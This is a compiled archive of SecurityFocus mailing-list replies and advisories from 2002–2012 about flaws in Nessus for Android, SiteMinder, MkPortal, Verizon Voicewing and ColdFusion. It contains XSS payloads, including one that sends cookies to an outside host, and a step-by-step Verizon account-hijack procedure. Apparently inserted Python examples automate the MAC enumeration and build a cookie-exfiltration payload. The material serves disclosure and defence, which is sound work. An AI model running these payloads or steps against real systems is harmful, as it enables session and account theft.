NESSUS ANDROID APP - stores login info in plain text

2012-07-23 Thread securityfocus
Nessus app for android
version 1.0.1

The app allows the user to save Nessus server info (IP/username/password).

The app saves this info to
/sdcard/servers.id

This file can be viewed with Notepad, and the password is right there in plain text. 
This means any app on the system can see that info and possibly transmit it to 
an attacker.


Re: Default key algorithm in Thomson and BT Home Hub routers

2008-11-10 Thread securityfocus
I've created an online lookup (no brute force) tool that lets you retrieve the 
WPA keys for speedtouch modems: 
http://www.nickkusters.com/articles/79/Online_SpeedTouch_WPA_Key_Lookup.aspx


Re: Lifetype 1.2.7 XSS Vulnerability

2008-05-05 Thread securityfocus
Fixed in 1.2.8.  Trivial issue, right, and hardly worth reporting, or is there 
a more significant issue that I am missing?


Re: Re: heanet.dl.sourceforge.net hacked?

2008-04-30 Thread securityfocus . com
The problem is:

md5sums and sizes on http://www.libpng.org/pub/png/libpng.html do not match 
sourceforge mirrors and ftp.simplesystems.org etc.

libpng.org: 641193 bytes for libpng-1.2.27.tar.bz2
ftp.simplesystems.org and sourceforge: 804821 bytes


Re: PR07-38: XSS on sIFR

2008-01-22 Thread bugs+securityfocus
Unfortunately there's a bit of confusion, as Mike Davidson of 
mikeindustries.com is no longer the maintainer of sIFR, and he has not updated 
the sIFR page in a while.


This issue was found and resolved on July 4th 2007, in version 2.0.3. It also 
appears that Internet Explorer is not vulnerable to this attack.


More about 2.0.3 and the XSS issue here: http://novemberborn.net/sifr/2.0.3


Re: Simple Machine Forum - Private section/posts/info disclosure

2007-11-09 Thread klynn . securityfocus
This is the second SMF vulnerability announced in the recent weeks that appears 
to be caused by administrative misconfiguration rather than an error in SMF. I 
have tested this on a default SMF 1.1.4 test environment and it did not work 
for me. 


Given the fact that previous messages from h3llcode or others in your 
blackroots.it group make mention of the use of .htaccess for controlling access 
to sensitive areas, it seems likely that h3llcode has opened permissions to 
allow escalated privileges to others and is then attempting to control those 
privileges using .htaccess files. Either that or h3llcode is testing the 
advanced search from an account enabled with escalated privileges already.


h3llcode, please create a default SMF 1.1.4 test environment and report back on 
your findings. If it can be duplicated in a properly configured SMF forum, I'm 
very interested in knowing about it.


Thank you,

Kevin Lynn, CISSP


Re: SiteMinder Agent: Cross Site Scripting

2007-11-08 Thread securityfocus
Would you explain in detail how this is a successful exploit?


I ran 
https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0
 against the current 6.0.5.11 SiteMinder Web Agent. 


This attempt is stopped with the following two errors in the Web Agent log.

1. Error.  No redirect target found in namespace.

2. unable to process FCC parameters. Returning SmNoAction.


SiteMinder only causes a redirect to smpwservices.fcc on certain conditions, 
it's not accessed directly, and it would not generate a URL with a query string 
that only includes SMAUTHREASON=.


Or are you attempting to replace SMAUTHREASON= with 
SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0 in the query string 
during the normal process with something like burp proxy?


I tested that as well, and the inserted code was ignored and didn't persist to 
the next step during the process.


Re: "BIND 9 DNS Cache Poisoning" by Amit Klein (Trusteer)

2007-07-24 Thread securityfocus
I don't exactly see how this is new "News" since Zalewski's paper on TCP 
sequence number analysis (which included analysis of versions of BIND):

http://lcamtuf.coredump.cx/newtcp/

-ntn



Re: MkPortal Urlobox Cross Site Request Forgery

2006-12-21 Thread securityfocus
This is a bogus report. Only Administrators have perms to post URLs in the 
Urlobox. I think we can safely assume that an Admin is not going to hack his 
own website.

-=DKC=-
mkportal.it


Re: MkPortal Urlobox Cross Site Request Forgery

2006-12-21 Thread securityfocus
I was wrong about this issue in my previous post.

Unofficial Solution:

FIND in /mkportal/modules/urlobox/index.php:
$message = preg_replace('/\[URL=(.+?)\](.+)\[\/URL\]/',$no_url,$message);
$message = preg_replace('/\[IMG\](.+?)\[\/IMG\]/',$no_img,$message);

REPLACE WITH:
$message = preg_replace('/\[URL=(.+?)\](.+)\[\/URL\]/i',$no_url,$message);
$message = preg_replace('/\[IMG\](.+?)\[\/IMG\]/i',$no_img,$message);

-=DKC=-
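As an added example, not code from the MkPortal project or from the post above, the two posted patterns transcribed into Python's re module to show what the /i fix changes: the original case-sensitive filter lets a lower-case [url=...] or [Img] tag straight through, while the case-insensitive version strips every case variant. The replacement strings stand in for $no_url and $no_img, and the two test messages are constructed.

```python
import re

# The two BBCode patterns posted for MkPortal's Urlobox, transcribed from PCRE
# into Python's re module (identical syntax for these patterns). The
# replacement strings below are assumed stand-ins for $no_url / $no_img.
NO_URL = "(url removed)"
NO_IMG = "(img removed)"

URL_TAG = r"\[URL=(.+?)\](.+)\[\/URL\]"
IMG_TAG = r"\[IMG\](.+?)\[\/IMG\]"


def strip_tags_case_sensitive(message: str) -> str:
    """The original filter: matches only upper-case [URL=...] and [IMG] tags."""
    message = re.sub(URL_TAG, NO_URL, message)
    message = re.sub(IMG_TAG, NO_IMG, message)
    return message


def strip_tags_case_insensitive(message: str) -> str:
    """The patched filter: the PCRE /i modifier, here re.IGNORECASE, also
    catches [url=...], [Img] and every other case variant of the tags."""
    message = re.sub(URL_TAG, NO_URL, message, flags=re.IGNORECASE)
    message = re.sub(IMG_TAG, NO_IMG, message, flags=re.IGNORECASE)
    return message


def tags_remaining(message: str) -> bool:
    """True if a URL or IMG BBCode opening tag, in any case, survived filtering."""
    return re.search(r"\[(url|img)\b", message, flags=re.IGNORECASE) is not None


# Constructed test messages: the first is what the original regex expected,
# the second is the case-variant bypass that the /i fix closes.
UPPER = "see [URL=http://example.invalid/]here[/URL] and [IMG]http://example.invalid/a.png[/IMG]"
LOWER = "see [url=http://example.invalid/]here[/url] and [Img]http://example.invalid/a.png[/Img]"

if __name__ == "__main__":
    for label, msg in (("upper-case", UPPER), ("mixed-case", LOWER)):
        before = strip_tags_case_sensitive(msg)
        after = strip_tags_case_insensitive(msg)
        print(f"{label}: original filter leaves tags? {tags_remaining(before)}; "
              f"patched filter leaves tags? {tags_remaining(after)}")
```

The same bypass applies to any tag filter written as a case-sensitive regex over a markup language whose parser is case-insensitive; the mismatch between filter and consumer is the bug, not the regex itself.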


Re: Re: Apple Remote Desktop root vulnerability

2006-09-26 Thread securityfocus
This is not so much a vulnerability as an oversight.  Whose oversight is up to 
you, but if you run a process remotely as root, and it has a GUI, then the GUI 
will appear on the screen, as a root process.  This usually involves a menubar, 
and thereby access to System Preferences.  An easy demonstration is using SSH 
to log into a box, sudo -s to get a root shell, and execute ANY program in the 
applications directory (open -a Safari).  You'll get Safari and access to the 
menubar with the login window appearing as a hindrance.  This isn't anything 
new; the guys using RADMIND have been fighting it since 10.4 came out and 
redid the way the system handles the login window at startup.  On the automated 
side, applications like iHook have created a very nice workaround for this.  
At the ARD end, the lock screen function does this well enough.  It's merely a 
matter of testing deployment on a machine you have physical access to before 
shoving it down to x-number of computers.  


This is something John Welch (bynkii.com) harped about this spring.  It's shoddy 
design by many App Designers not to give a proper remote installer or pkg 
file that can execute silently.  Whether or not this is something Apple needs 
to fix, that's up for debate.  They are not necessarily in the wrong here, 
regardless of how much it may appear to be an obvious security flaw.  Maybe 
they should check to see if the LoginWindow is displayed before allowing a GUI 
app to run with root privileges, but after debating this issue enough I've 
come to the conclusion that Apple, the programmers, and the administrators are 
all at fault at some level. 


Re: Startpage <= 1.0 (cfgLanguage) Remote File Inclusion Vulnerability

2006-08-21 Thread securityfocus
I made this script a long time ago and actually I don't use it anymore (I use a 
newer version which is not ready for "the real world" yet). By accident I 
discovered this page when I showed someone how many hits you get when you 
google your own name.


You say "Venedor Contacted, But No Response", but I haven't seen a mail about 
this, or it was disguised as spam and I removed it.


But I made a quick update (remove the language option) and placed it on my site 
(http://matthijs.draijer.org/download.php?id=35)


Re: Photocycle v1.0 - XSS

2006-07-14 Thread securityfocus
Patched within a couple hours of discovery. Download version 1.1.


Photocycle homepage: http://adambrown.info/p/tools/photocycle


Verizon Voicewing and Linksys PAP2-VN

2006-05-11 Thread securityfocus
Product: Verizon voicewing combined with Linksys PAP2-VN

Reported by: Haavar Valeur

Status: Vendor unwilling to address the problem

Reported: Mar 15, 2006



I found a way to make and receive calls from other Verizon accounts.


The problem is that Verizon publishes encrypted configuration files containing 
the username and password. These files are published through TFTP and HTTP, and 
are publicly readable. A vulnerability is created because the PAP2-VN adapter 
trusts the web server to give it the correct file. The PAP2 adapter accepts and 
decrypts configuration files for other accounts if they are available at the 
URI where the adapter expects to find its configuration file.


The following steps can be taken by anyone with a PAP2-VN adapter to access 
random users' accounts:

1) Create a subnet that you are able to isolate from the internet

2) Block all TFTP access from the subnet to the Internet. This will make the 
adapter failover to http (I did not bother to set up a tftp server). 

3) Redirect all HTTP requests made from the subnet to a web server you control 
(possible with e.g. iptables)

4) Connect the PAP2 adapter to the subnet and wait for the adapter to try to 
get the config file.

5) Look in the web server access log or tcpdump to find what URL the PAP2 tries 
to access on the web server

6) The URL should contain the MAC address of the PAP2. Try finding another 
valid MAC by changing one of the least significant digits, and download the 
file from Verizon's web server.

7) Rename the file you downloaded to the filename the PAP2 tried to access and 
put it on the web server so the PAP2 will download this file.

8) The PAP2 will download and decrypt this file containing the account 
information of the other user and connect to the SIP server.

9) Now you can make and receive calls from another account


This has been tested on a PAP2-VN with firmware v2.0.10 and Verizon Voicewing, but 
could apply to other vendors using this adapter.
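An added example, not from the report above or from Verizon or Linksys, covering steps 5 and 6 in Python: pull the provisioning request out of a constructed access-log line, extract the MAC address embedded in the request path, and generate the neighbouring MACs to try against the provisioning server. The /prov/<MAC>.cfg path layout, the log lines and the MAC values are assumptions; the report gives no actual URL format. The network isolation and HTTP redirect of steps 1 to 4 are not part of this block.

```python
import re
from typing import Iterator

# Constructed web-server access log, standing in for the log read in step 5.
# The provisioning path layout (/prov/<MAC>.cfg) is an assumption; the report
# does not state Verizon's actual URL format.
SAMPLE_ACCESS_LOG = """\
192.168.50.20 - - [11/May/2006:10:01:02 -0400] "GET /prov/001C10A1B2C3.cfg HTTP/1.1" 404 0
192.168.50.21 - - [11/May/2006:10:01:07 -0400] "GET /favicon.ico HTTP/1.1" 404 0
"""

REQUEST_LINE = re.compile(r'"GET (?P<path>\S+) HTTP/1\.[01]"')
MAC_IN_PATH = re.compile(r"(?P<mac>[0-9A-Fa-f]{12})")


def config_requests(log_text: str) -> list[str]:
    """Return the request paths that embed a 12-hex-digit MAC address,
    i.e. the adapter's attempts to fetch its own configuration file."""
    paths = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.search(line)
        if m and MAC_IN_PATH.search(m.group("path")):
            paths.append(m.group("path"))
    return paths


def neighbour_macs(mac: str, spread: int) -> Iterator[str]:
    """Yield MACs within +/- spread of the given one, keeping the vendor OUI
    (first six hex digits) fixed, as step 6 does by varying the low digits."""
    oui, serial = mac[:6].upper(), int(mac[6:], 16)
    for delta in range(-spread, spread + 1):
        if delta == 0:
            continue
        candidate = serial + delta
        if 0 <= candidate <= 0xFFFFFF:
            yield f"{oui}{candidate:06X}"


def candidate_paths(log_text: str, spread: int = 2) -> list[str]:
    """Rewrite each observed config path with neighbouring MACs, giving the
    list of paths one would request from the real provisioning server."""
    out = []
    for path in config_requests(log_text):
        mac = MAC_IN_PATH.search(path).group("mac")
        for other in neighbour_macs(mac, spread):
            out.append(path.replace(mac, other))
    return out


if __name__ == "__main__":
    for p in candidate_paths(SAMPLE_ACCESS_LOG):
        print(p)
```

The weakness the enumeration exploits is that the only secret binding a device to its configuration file is its MAC address, which is both predictable from a neighbour's and carried in a publicly readable URL; the adapter's trust in whatever server answers (step 7) then turns a downloaded file into a working account.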


Re: Cross-site scripting vulnerability in CF 5.0

2002-12-16 Thread SecurityFocus
Something to note:

The 'view admin log' feature in CF tends to cause stress on the CF
process, and also blocks the log file while it is open.

So it's generally better (and safer, given this cross-site scripting
problem that's been around for years) to view the log files via a text
viewer on the system.

By default, it's c:\cfusion\log\*.log


On Mon, 16 Dec 2002, KiLL CoLe wrote:

> Cross-site scripting vulnerability in CF 5.0.  This
> issue was brought up to macromedia on July 22nd, 2002.
> Macromedia issued a fix to me, but I have not seen the
> fix available to the public.  the coldfusion
> administrator allows you to view your application log
> via your web browser.  Under certain conditions, it is
> possible to remotely alter coldfusions application
> log.  take the following code:
>
> 
>SELECT * FROM Products
>Where ProductId = #int(url.productid)#
> 
>
> if the INT function encounters a value that is not
> numeric, it throws an exception and writes the value
> that was passed to application.log. Should an
> unsuspecting administrator view the log file via their
> web browser, script could be executed.  Analyze this
> code:
> if url.productid (from the above example) were passed
> in as:
>
> 
> document.frame1.location="http://www.domain.com/index.cfm?stealcookie=";
> + document.cookie
>
> this would enable an attacker to steal the value of
> the coldfusion administrators cookie.  Decrypting the
> coldfusion admin's password is well documented, and
> exposes a mild-moderate threat to server security.
>
> **NOTE: there are dozens of other functions that throw
> exceptions similar to the INT function.
>

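An added example, not from the quoted advisory or from Macromedia, modelling the chain in Python: a conversion routine that, like the int() behaviour described above, echoes the rejected value into an application log; a log viewer that pastes entries into the page unescaped, which is what makes the stored script run in the administrator's browser; and the same viewer with HTML escaping, which is the fix for a browser-based log view. The log structure, the attacker hostname and the payload are constructed.

```python
import html
import re
from dataclasses import dataclass, field


@dataclass
class AppLog:
    """Constructed stand-in for ColdFusion's application.log: a list of
    entries, each recording an exception message verbatim."""
    entries: list[str] = field(default_factory=list)

    def write(self, message: str) -> None:
        self.entries.append(message)


def to_int(raw: str, log: AppLog) -> int:
    """Mimics the behaviour the advisory describes for int(): a non-numeric
    value raises, and the offending value is written into the log as-is."""
    if not re.fullmatch(r"-?\d+", raw.strip()):
        log.write(f"Error: the value '{raw}' cannot be converted to an integer.")
        raise ValueError(raw)
    return int(raw)


def render_log_unsafe(log: AppLog) -> str:
    """The vulnerable viewer: log text is pasted straight into the page, so a
    <script> element written by to_int() executes when an admin views it."""
    return "<pre>" + "\n".join(log.entries) + "</pre>"


def render_log_escaped(log: AppLog) -> str:
    """The hardened viewer: every entry is HTML-escaped before rendering, so
    the payload is displayed as text rather than executed."""
    return "<pre>" + "\n".join(html.escape(e) for e in log.entries) + "</pre>"


def contains_script_tag(page: str) -> bool:
    """Crude check used here to tell executable markup from escaped text."""
    return re.search(r"<script\b", page, flags=re.IGNORECASE) is not None


# Constructed attacker value for ?productid=..., in the spirit of the
# advisory's cookie-stealing example but with a placeholder hostname.
PAYLOAD = '<script>document.location="http://attacker.invalid/?c="+document.cookie</script>'


def demo() -> tuple[bool, bool]:
    """Return (unsafe viewer carries live script?, escaped viewer does?)."""
    log = AppLog()
    try:
        to_int(PAYLOAD, log)
    except ValueError:
        pass
    return contains_script_tag(render_log_unsafe(log)), contains_script_tag(render_log_escaped(log))


if __name__ == "__main__":
    unsafe, escaped = demo()
    print(f"unsafe viewer executes payload: {unsafe}; escaped viewer: {escaped}")
```

Escaping at render time is the right place for the fix: the log should keep the raw value for forensic purposes, and any consumer that turns log text into HTML has to treat it as untrusted input.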



Re: ZoneEdit Account Hijack Vulnerability

2002-11-06 Thread securityfocus
>
>The webmasters of this site were informed of this vulnerability on 
>05 November 2002.  To date, no useable information on protecting 
>against this vulnerability has been received.
>

Matt and Paul were contacted on 05 November 2002 to notify them that a 
security review had been completed, and to please re-run their tests. No 
reply has yet been received.

Erik Aronesty
ZoneEdit CEO